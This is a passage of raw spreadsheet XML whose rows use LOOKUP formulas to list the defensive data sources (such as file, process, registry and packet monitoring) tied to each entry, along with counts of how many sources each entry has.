        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C150" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D150" s="6">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E150" s="6">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F150" s="6"/>
      <c r="G150" s="6"/>
    </row>
    <row r="151" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A151" s="11" t="s">
        <v>211</v>
      </c>
      <c r="B151" s="6" t="str">
        <f>LOOKUP(A151,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C151" s="12" t="s">
        <v>1247</v>
      </c>
      <c r="D151" s="6">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E151" s="6">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F151" s="6"/>
      <c r="G151" s="6"/>
    </row>
    <row r="152" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A152" s="11" t="s">
        <v>212</v>
      </c>
      <c r="B152" s="6" t="str">
        <f>LOOKUP(A152,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C152" s="12" t="s">
        <v>1253</v>
      </c>
      <c r="D152" s="6">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E152" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F152" s="6"/>
      <c r="G152" s="6"/>
    </row>
    <row r="153" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A153" s="11" t="s">
        <v>213</v>
      </c>
      <c r="B153" s="6" t="str">
        <f>LOOKUP(A153,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C153" s="12" t="s">
        <v>1247</v>
      </c>
      <c r="D153" s="6">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E153" s="6">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F153" s="6"/>
      <c r="G153" s="6"/>
    </row>
    <row r="154" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A154" s="11" t="s">
        <v>214</v>
      </c>
      <c r="B154" s="6" t="str">
        <f>LOOKUP(A154,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C154" s="12" t="s">
        <v>1287</v>
      </c>
      <c r="D154" s="6">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E154" s="6">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F154" s="6"/>
      <c r="G154" s="6"/>
    </row>
    <row r="155" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A155" s="11" t="s">
        <v>215</v>
      </c>
      <c r="B155" s="6" t="str">
        <f>LOOKUP(A155,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C155" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D155" s="6">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E155" s="6">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F155" s="6"/>
      <c r="G155" s="6"/>
    </row>
    <row r="156" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A156" s="11" t="s">
        <v>216</v>
      </c>
      <c r="B156" s="6" t="str">
        <f>LOOKUP(A156,'REF-DataSources'!A:C)</f>
        <v>API monitoring,System calls,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C156" s="12" t="s">
        <v>1225</v>
      </c>
      <c r="D156" s="6">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E156" s="6">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F156" s="6"/>
      <c r="G156" s="6"/>
    </row>
    <row r="157" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A157" s="11" t="s">
        <v>217</v>
      </c>
      <c r="B157" s="6" t="str">
        <f>LOOKUP(A157,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Process use of network</v>
      </c>
      <c r="C157" s="12" t="s">
        <v>1225</v>
      </c>
      <c r="D157" s="6">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E157" s="6">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F157" s="6"/>
      <c r="G157" s="6"/>
    </row>
    <row r="158" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A158" s="11" t="s">
        <v>218</v>
      </c>
      <c r="B158" s="6" t="str">
        <f>LOOKUP(A158,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C158" s="12">
        <v>100</v>
      </c>
      <c r="D158" s="6">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E158" s="6">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F158" s="6"/>
      <c r="G158" s="6"/>
    </row>
    <row r="159" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A159" s="11" t="s">
        <v>219</v>
      </c>
      <c r="B159" s="6" t="str">
        <f>LOOKUP(A159,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C159" s="12" t="s">
        <v>1247</v>
      </c>
      <c r="D159" s="6">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E159" s="6">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F159" s="6"/>
      <c r="G159" s="6"/>
    </row>
    <row r="160" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A160" s="11" t="s">
        <v>220</v>
      </c>
      <c r="B160" s="6" t="str">
        <f>LOOKUP(A160,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C160" s="12" t="s">
        <v>1229</v>
      </c>
      <c r="D160" s="6">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E160" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F160" s="6"/>
      <c r="G160" s="6"/>
    </row>
    <row r="161" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A161" s="11" t="s">
        <v>221</v>
      </c>
      <c r="B161" s="6" t="str">
        <f>LOOKUP(A161,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C161" s="12" t="s">
        <v>1229</v>
      </c>
      <c r="D161" s="6">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E161" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F161" s="6"/>
      <c r="G161" s="6"/>
    </row>
    <row r="162" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A162" s="11" t="s">
        <v>222</v>
      </c>
      <c r="B162" s="6" t="str">
        <f>LOOKUP(A162,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Process monitoring,Process command-line parameters,File monitoring</v>
      </c>
      <c r="C162" s="12" t="s">
        <v>1225</v>
      </c>
      <c r="D162" s="6">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E162" s="6">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F162" s="6"/>
      <c r="G162" s="6"/>
    </row>
    <row r="163" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A163" s="11" t="s">
        <v>223</v>
      </c>
      <c r="B163" s="6" t="str">
        <f>LOOKUP(A163,'REF-DataSources'!A:C)</f>
        <v>File monitoring,API monitoring</v>
      </c>
      <c r="C163" s="12" t="s">
        <v>1229</v>
      </c>
      <c r="D163" s="6">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E163" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F163" s="6"/>
      <c r="G163" s="6"/>
    </row>
    <row r="164" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A164" s="11" t="s">
        <v>224</v>
      </c>
      <c r="B164" s="6" t="str">
        <f>LOOKUP(A164,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C164" s="12" t="s">
        <v>1253</v>
      </c>
      <c r="D164" s="6">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E164" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F164" s="6"/>
      <c r="G164" s="6"/>
    </row>
    <row r="165" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A165" s="11" t="s">
        <v>225</v>
      </c>
      <c r="B165" s="6" t="str">
        <f>LOOKUP(A165,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C165" s="12">
        <v>0</v>
      </c>
      <c r="D165" s="6">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E165" s="6">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F165" s="6"/>
      <c r="G165" s="6"/>
    </row>
    <row r="166" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A166" s="11" t="s">
        <v>226</v>
      </c>
      <c r="B166" s="6" t="str">
        <f>LOOKUP(A166,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C166" s="12" t="s">
        <v>1253</v>
      </c>
      <c r="D166" s="6">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E166" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F166" s="6"/>
      <c r="G166" s="6"/>
    </row>
    <row r="167" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A167" s="11" t="s">
        <v>227</v>
      </c>
      <c r="B167" s="6" t="str">
        <f>LOOKUP(A167,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C167" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D167" s="6">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E167" s="6">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F167" s="6"/>
      <c r="G167" s="6"/>
    </row>
    <row r="168" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A168" s="11" t="s">
        <v>228</v>
      </c>
      <c r="B168" s="6" t="str">
        <f>LOOKUP(A168,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C168" s="12">
        <v>100</v>
      </c>
      <c r="D168" s="6">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E168" s="6">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F168" s="6"/>
      <c r="G168" s="6"/>
    </row>
    <row r="169" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A169" s="11" t="s">
        <v>229</v>
      </c>
      <c r="B169" s="6" t="str">
        <f>LOOKUP(A169,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C169" s="12" t="s">
        <v>1253</v>
      </c>
      <c r="D169" s="6">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E169" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F169" s="6"/>
      <c r="G169" s="6"/>
    </row>
    <row r="170" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A170" s="11" t="s">
        <v>230</v>
      </c>
      <c r="B170" s="6" t="str">
        <f>LOOKUP(A170,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C170" s="12">
        <v>100</v>
      </c>
      <c r="D170" s="6">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E170" s="6">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F170" s="6"/>
      <c r="G170" s="6"/>
    </row>
    <row r="171" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A171" s="11" t="s">
        <v>231</v>
      </c>
      <c r="B171" s="6" t="str">
        <f>LOOKUP(A171,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C171" s="12" t="s">
        <v>1229</v>
      </c>
      <c r="D171" s="6">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E171" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F171" s="6"/>
      <c r="G171" s="6"/>
    </row>
    <row r="172" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A172" s="11" t="s">
        <v>232</v>
      </c>
      <c r="B172" s="6" t="str">
        <f>LOOKUP(A172,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Packet capture,Netflow/Enclave netflow</v>
      </c>
      <c r="C172" s="12" t="s">
        <v>1291</v>
      </c>
      <c r="D172" s="6">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E172" s="6">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F172" s="6"/>
      <c r="G172" s="6"/>
    </row>
    <row r="173" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A173" s="11" t="s">
        <v>233</v>
      </c>
      <c r="B173" s="6" t="str">
        <f>LOOKUP(A173,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Packet capture</v>
      </c>
      <c r="C173" s="12" t="s">
        <v>1253</v>
      </c>
      <c r="D173" s="6">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E173" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F173" s="6"/>
      <c r="G173" s="6"/>
    </row>
    <row r="174" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A174" s="11" t="s">
        <v>234</v>
      </c>
      <c r="B174" s="6" t="str">
        <f>LOOKUP(A174,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C174" s="12" t="s">
        <v>1234</v>
      </c>
      <c r="D174" s="6">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E174" s="6">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F174" s="6"/>
      <c r="G174" s="6"/>
    </row>
    <row r="175" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A175" s="11" t="s">
        <v>235</v>
      </c>
      <c r="B175" s="6" t="str">
        <f>LOOKUP(A175,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Process monitoring,Windows Registry</v>
      </c>
      <c r="C175" s="12" t="s">
        <v>1236</v>
      </c>
      <c r="D175" s="6">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E175" s="6">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F175" s="6"/>
      <c r="G175" s="6"/>
    </row>
    <row r="176" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A176" s="11" t="s">
        <v>236</v>
      </c>
      <c r="B176" s="6" t="str">
        <f>LOOKUP(A176,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,DLL monitoring,Packet capture,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C176" s="12" t="s">
        <v>1293</v>
      </c>
      <c r="D176" s="6">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E176" s="6">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F176" s="6"/>
      <c r="G176" s="6"/>
    </row>
    <row r="177" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A177" s="11" t="s">
        <v>237</v>
      </c>
      <c r="B177" s="6" t="str">
        <f>LOOKUP(A177,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Packet capture,System calls,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C177" s="12" t="s">
        <v>1294</v>
      </c>
      <c r="D177" s="6">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E177" s="6">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F177" s="6"/>
      <c r="G177" s="6"/>
    </row>
    <row r="178" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A178" s="11" t="s">
        <v>238</v>
      </c>
      <c r="B178" s="6" t="str">
        <f>LOOKUP(A178,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Kernel drivers,Loaded DLLs,Process monitoring</v>
      </c>
      <c r="C178" s="12" t="s">
        <v>1295</v>
      </c>
      <c r="D178" s="6">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E178" s="6">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F178" s="6"/>
      <c r="G178" s="6"/>
    </row>
    <row r="179" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A179" s="11" t="s">
        <v>239</v>
      </c>
      <c r="B179" s="6" t="str">
        <f>LOOKUP(A179,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Windows event logs</v>
      </c>
      <c r="C179" s="12" t="s">
        <v>1287</v>
      </c>
      <c r="D179" s="6">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E179" s="6">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F179" s="6"/>
      <c r="G179" s="6"/>
    </row>
    <row r="180" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A180" s="11" t="s">
        <v>240</v>
      </c>
      <c r="B180" s="6" t="str">
        <f>LOOKUP(A180,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Binary file metadata,DLL monitoring,Loaded DLLs,Process monitoring,Windows event logs</v>
      </c>
      <c r="C180" s="12" t="s">
        <v>1296</v>
      </c>
      <c r="D180" s="6">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E180" s="6">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F180" s="6"/>
      <c r="G180" s="6"/>
    </row>
    <row r="181" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A181" s="11" t="s">
        <v>241</v>
      </c>
      <c r="B181" s="6" t="str">
        <f>LOOKUP(A181,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Windows Registry,File monitoring</v>
      </c>
      <c r="C181" s="12" t="s">
        <v>1225</v>
      </c>
      <c r="D181" s="6">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E181" s="6">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F181" s="6"/>
      <c r="G181" s="6"/>
    </row>
    <row r="182" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A182" s="11" t="s">
        <v>242</v>
      </c>
      <c r="B182" s="6" t="str">
        <f>LOOKUP(A182,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring</v>
      </c>
      <c r="C182" s="12" t="s">
        <v>1253</v>
      </c>
      <c r="D182" s="6">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E182" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F182" s="6"/>
      <c r="G182" s="6"/>
    </row>
    <row r="183" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A183" s="11" t="s">
        <v>243</v>
      </c>
      <c r="B183" s="6" t="str">
        <f>LOOKUP(A183,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,Process monitoring,Windows Registry</v>
      </c>
      <c r="C183" s="12" t="s">
        <v>1236</v>
      </c>
      <c r="D183" s="6">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E183" s="6">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F183" s="6"/>
      <c r="G183" s="6"/>
    </row>
    <row r="184" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A184" s="11" t="s">
        <v>244</v>
      </c>
      <c r="B184" s="6" t="str">
        <f>LOOKUP(A184,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C184" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D184" s="6">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E184" s="6">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F184" s="6"/>
      <c r="G184" s="6"/>
    </row>
    <row r="185" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A185" s="11" t="s">
        <v>245</v>
      </c>
      <c r="B185" s="6" t="str">
        <f>LOOKUP(A185,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C185" s="12">
        <v>100</v>
      </c>
      <c r="D185" s="6">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E185" s="6">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F185" s="6"/>
      <c r="G185" s="6"/>
    </row>
    <row r="186" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A186" s="11" t="s">
        <v>246</v>
      </c>
      <c r="B186" s="6" t="str">
        <f>LOOKUP(A186,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Packet capture,Process monitoring,API monitoring</v>
      </c>
      <c r="C186" s="12" t="s">
        <v>1297</v>
      </c>
      <c r="D186" s="6">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E186" s="6">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F186" s="6"/>
      <c r="G186" s="6"/>
    </row>
    <row r="187" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A187" s="11" t="s">
        <v>247</v>
      </c>
      <c r="B187" s="6" t="str">
        <f>LOOKUP(A187,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring</v>
      </c>
      <c r="C187" s="12" t="s">
        <v>1292</v>
      </c>
      <c r="D187" s="6">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E187" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F187" s="6"/>
      <c r="G187" s="6"/>
    </row>
    <row r="188" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A188" s="11" t="s">
        <v>248</v>
      </c>
      <c r="B188" s="6" t="str">
        <f>LOOKUP(A188,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Network protocol analysis,Network device logs,Process use of network</v>
      </c>
      <c r="C188" s="12" t="s">
        <v>1298</v>
      </c>
      <c r="D188" s="6">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E188" s="6">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F188" s="6"/>
      <c r="G188" s="6"/>
    </row>
    <row r="189" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A189" s="11" t="s">
        <v>249</v>
      </c>
      <c r="B189" s="6" t="str">
        <f>LOOKUP(A189,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Netflow/Enclave netflow</v>
      </c>
      <c r="C189" s="12" t="s">
        <v>1292</v>
      </c>
      <c r="D189" s="6">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E189" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F189" s="6"/>
      <c r="G189" s="6"/>
    </row>
    <row r="190" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A190" s="11" t="s">
        <v>250</v>
      </c>
      <c r="B190" s="6" t="str">
        <f>LOOKUP(A190,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network device logs,Process use of network,Web proxy,Network intrusion detection system,SSL/TLS inspection</v>
      </c>
      <c r="C190" s="12" t="s">
        <v>1299</v>
      </c>
      <c r="D190" s="6">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E190" s="6">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F190" s="6"/>
      <c r="G190" s="6"/>
    </row>
    <row r="191" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A191" s="11" t="s">
        <v>251</v>
      </c>
      <c r="B191" s="6" t="str">
        <f>LOOKUP(A191,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
      <c r="C191" s="12" t="s">
        <v>1225</v>
      </c>
      <c r="D191" s="6">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E191" s="6">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F191" s="6"/>
      <c r="G191" s="6"/>
    </row>
    <row r="192" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A192" s="11" t="s">
        <v>252</v>
      </c>
      <c r="B192" s="6" t="str">
        <f>LOOKUP(A192,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Process use of network,Windows event logs</v>
      </c>
      <c r="C192" s="12" t="s">
        <v>1300</v>
      </c>
      <c r="D192" s="6">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E192" s="6">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F192" s="6"/>
      <c r="G192" s="6"/>
    </row>
    <row r="193" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A193" s="11" t="s">
        <v>253</v>
      </c>
      <c r="B193" s="6" t="str">
        <f>LOOKUP(A193,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Web proxy,Email gateway,Detonation chamber,SSL/TLS inspection,DNS records,Mail server</v>
      </c>
      <c r="C193" s="12" t="s">
        <v>1301</v>
      </c>
      <c r="D193" s="6">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E193" s="6">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F193" s="6"/>
      <c r="G193" s="6"/>
    </row>
    <row r="194" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A194" s="11" t="s">
        <v>254</v>
      </c>
      <c r="B194" s="6" t="str">
        <f>LOOKUP(A194,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Packet capture,Network intrusion detection system,Detonation chamber,Email gateway,Mail server</v>
      </c>
      <c r="C194" s="12" t="s">
        <v>1302</v>
      </c>
      <c r="D194" s="6">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E194" s="6">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F194" s="6"/>
      <c r="G194" s="6"/>
    </row>
    <row r="195" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A195" s="11" t="s">
        <v>255</v>
      </c>
      <c r="B195" s="6" t="str">
        <f>LOOKUP(A195,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Anti-virus,Web proxy</v>
      </c>
      <c r="C195" s="12" t="s">
        <v>1287</v>
      </c>
      <c r="D195" s="6">
        <f t="shared" ref="D195:D224" si="7">LEN(TRIM(B195))-LEN(SUBSTITUTE(TRIM(B195),",",""))+1</f>
        <v>3</v>
      </c>
      <c r="E195" s="6">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F195" s="6"/>
      <c r="G195" s="6"/>
    </row>
    <row r="196" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A196" s="11" t="s">
        <v>256</v>
      </c>
      <c r="B196" s="6" t="str">
        <f>LOOKUP(A196,'REF-DataSources'!A:C)</f>
        <v>Web proxy,File monitoring</v>
      </c>
      <c r="C196" s="12" t="s">
        <v>68</v>
      </c>
      <c r="D196" s="6">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E196" s="6">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F196" s="6"/>
      <c r="G196" s="6"/>
    </row>
    <row r="197" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A197" s="11" t="s">
        <v>257</v>
      </c>
      <c r="B197" s="6" t="str">
        <f>LOOKUP(A197,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Binary file metadata,DLL monitoring,Windows Registry,Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C197" s="12" t="s">
        <v>1303</v>
      </c>
      <c r="D197" s="6">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E197" s="6">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F197" s="6"/>
      <c r="G197" s="6"/>
    </row>
    <row r="198" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A198" s="11" t="s">
        <v>258</v>
      </c>
      <c r="B198" s="6" t="str">
        <f>LOOKUP(A198,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Packet capture,Windows event logs</v>
      </c>
      <c r="C198" s="12" t="s">
        <v>1247</v>
      </c>
      <c r="D198" s="6">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E198" s="6">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F198" s="6"/>
      <c r="G198" s="6"/>
    </row>
    <row r="199" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A199" s="11" t="s">
        <v>259</v>
      </c>
      <c r="B199" s="6" t="str">
        <f>LOOKUP(A199,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Application logs,DLL monitoring,Loaded DLLs,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C199" s="12" t="s">
        <v>1303</v>
      </c>
      <c r="D199" s="6">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E199" s="6">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F199" s="6"/>
      <c r="G199" s="6"/>
    </row>
    <row r="200" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A200" s="11" t="s">
        <v>260</v>
      </c>
      <c r="B200" s="6" t="str">
        <f>LOOKUP(A200,'REF-DataSources'!A:C)</f>
        <v>Application logs,Authentication logs,Third-party application logs</v>
      </c>
      <c r="C200" s="12" t="s">
        <v>1228</v>
      </c>
      <c r="D200" s="6">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E200" s="6">
        <f t="shared" si="6"/>
